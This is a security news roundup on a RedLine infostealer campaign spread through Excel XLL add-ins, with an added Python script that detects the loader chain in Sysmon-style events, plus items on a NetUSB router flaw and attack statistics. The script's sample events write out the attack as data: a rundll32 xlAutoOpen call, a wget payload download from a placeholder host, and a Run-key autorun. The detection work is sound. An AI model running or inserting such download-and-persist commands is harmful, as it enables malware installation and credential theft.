BleepingComputer reports a widespread spam campaign that abuses website contact forms and discussion forums to distribute malicious Excel XLL add-in files, which in turn install the RedLine information-stealing malware.
Beyond exfiltrating the usernames, passwords, cookies and credit-card data saved in web browsers, RedLine can also steal FTP credentials and files, execute commands, take screenshots, and download and run additional malware.
The lures vary: some messages pose as advertising requests or gift guides, and some point to fraudulent websites set up specifically to host the malicious XLL file.
An XLL file is a DLL that exposes Excel's add-in interface, and Excel calls its xlAutoOpen export when the add-in loads; the same entry point can be triggered by hand with 'rundll32 name.xll,xlAutoOpen' or by loading the file with regsvr32.exe. Doing so extracts a copy of wget.exe into the %UserProfile% folder, which the loader then uses to download the RedLine binary from a remote server. RedLine persists through a Registry autorun entry, so it is relaunched each time the user logs into Windows and can keep harvesting the data saved in the user's browsers.
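The chain above (a living-off-the-land binary loading an .xll, wget.exe appearing in a user profile, a Run-key autorun pointing back into that profile) is easy to hunt for in endpoint telemetry. The following is an added example, not code from BleepingComputer or from the researchers cited; it runs four detection rules over a handful of constructed Sysmon-style key=value event lines (the event format, host paths, SID, URL and file names are all assumptions made for this example) and only calls the host compromised when more than one stage of the chain is present, since wget.exe on its own is legitimate software.

```python
"""Hunt Sysmon-like process/file/registry events for the RedLine XLL loader
chain: rundll32/regsvr32 invoking an .xll, wget.exe dropped into and run from
%UserProfile%, and a Run-key autorun that points into the profile.
The key=value event text and every sample line below are constructed for
this example; they are not a real product export or real incident data."""
import re

# key=value pairs; values containing spaces are double-quoted.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
XLL_RE = re.compile(r"\.xll\b", re.I)
# A path somewhere under a user's profile, e.g. C:\Users\alice\...
USER_PROFILE_RE = re.compile(r"[A-Z]:\\Users\\[^\\]+\\", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def parse_event(line):
    """Turn one 'Key=value Key="quoted value"' line into a dict."""
    return {k: (q if q else u) for k, q, u in KV_RE.findall(line)}


def rule_xll_via_lolbin(ev):
    """Event 1 (process create): rundll32/regsvr32 given an .xll argument."""
    image = ev.get("Image", "").lower()
    return (ev.get("EventID") == "1"
            and image.endswith(("\\rundll32.exe", "\\regsvr32.exe"))
            and bool(XLL_RE.search(ev.get("CommandLine", ""))))


def rule_wget_dropped_in_profile(ev):
    """Event 11 (file create): wget.exe written under a user profile."""
    target = ev.get("TargetFilename", "")
    return (ev.get("EventID") == "11"
            and target.lower().endswith("\\wget.exe")
            and bool(USER_PROFILE_RE.search(target)))


def rule_wget_run_from_profile(ev):
    """Event 1: wget.exe executed from a user profile rather than an install dir."""
    image = ev.get("Image", "")
    return (ev.get("EventID") == "1"
            and image.lower().endswith("\\wget.exe")
            and bool(USER_PROFILE_RE.search(image)))


def rule_autorun_into_profile(ev):
    """Event 13 (registry set): a Run key whose value points into a user profile."""
    return (ev.get("EventID") == "13"
            and bool(RUN_KEY_RE.search(ev.get("TargetObject", "")))
            and bool(USER_PROFILE_RE.search(ev.get("Details", ""))))


RULES = {
    "xll_loaded_via_rundll32_or_regsvr32": rule_xll_via_lolbin,
    "wget_dropped_in_user_profile": rule_wget_dropped_in_profile,
    "wget_executed_from_user_profile": rule_wget_run_from_profile,
    "run_key_autorun_into_user_profile": rule_autorun_into_profile,
}


def scan(lines):
    """Return [(line_number, rule_name)] for every event that trips a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        hits.extend((n, name) for name, rule in RULES.items() if rule(ev))
    return hits


def chain_detected(hits, min_stages=2):
    """Individual stages are noisy (wget.exe is legitimate software), so only
    call the host compromised when several distinct stages of the chain appear."""
    return len({name for _, name in hits}) >= min_stages


# Constructed sample: lines 1-4 are the loader chain, lines 5-7 are benign noise
# (a vendor DLL registered by an installer, Git's own wget.exe, an HKLM Run key
# pointing at Program Files). The SID and URL are placeholders.
SAMPLE_EVENTS = r'''
EventID=1 Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32 C:\Users\alice\Downloads\gift-guide.xll,xlAutoOpen" ParentImage=C:\Windows\explorer.exe
EventID=11 Image=C:\Windows\System32\rundll32.exe TargetFilename=C:\Users\alice\wget.exe
EventID=1 Image=C:\Users\alice\wget.exe CommandLine="wget.exe -q -O C:\Users\alice\AppData\Roaming\update.exe http://198.51.100.7/u" ParentImage=C:\Windows\System32\rundll32.exe
EventID=13 Image=C:\Users\alice\AppData\Roaming\update.exe TargetObject=HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater Details=C:\Users\alice\AppData\Roaming\update.exe
EventID=1 Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32 /s C:\Program Files\Vendor\vendor.dll" ParentImage=C:\Windows\System32\msiexec.exe
EventID=11 Image=C:\Program Files\Git\mingw64\bin\git.exe TargetFilename=C:\Program Files\Git\mingw64\bin\wget.exe
EventID=13 Image=C:\Windows\System32\msiexec.exe TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Vendor Details=C:\Program Files\Vendor\agent.exe
'''.strip().splitlines()

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for n, name in found:
        print(f"line {n}: {name}")
    print("chain detected:", chain_detected(found))
```

The rules deliberately key on where things run from rather than on file hashes, which the operators can change at will. In production the same logic would be fed from Sysmon or EDR process, file and registry events, and a fifth rule worth adding is Excel itself loading an add-in image from a user-writable path (an image-load event into EXCEL.EXE), since a victim who double-clicks the attachment never invokes rundll32 at all.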
Millions of consumer routers from Tenda, Netgear, Western Digital, TP-Link, D-Link and EDiMAX are affected by a high-severity buffer overflow in KCodes NetUSB, a Linux kernel module that lets devices on the local network use USB devices plugged into the router. Because the flaw sits in a kernel module that parses input arriving over the network, memory corruption there means kernel-level code execution on the router, so affected users should apply their vendor's firmware update as it becomes available.
Thirty-three percent of Americans experienced at least one cyberattack last year, and nearly half of those were phishing victims; cybersecurity incidents across the U.S. rose 27% compared with 2020.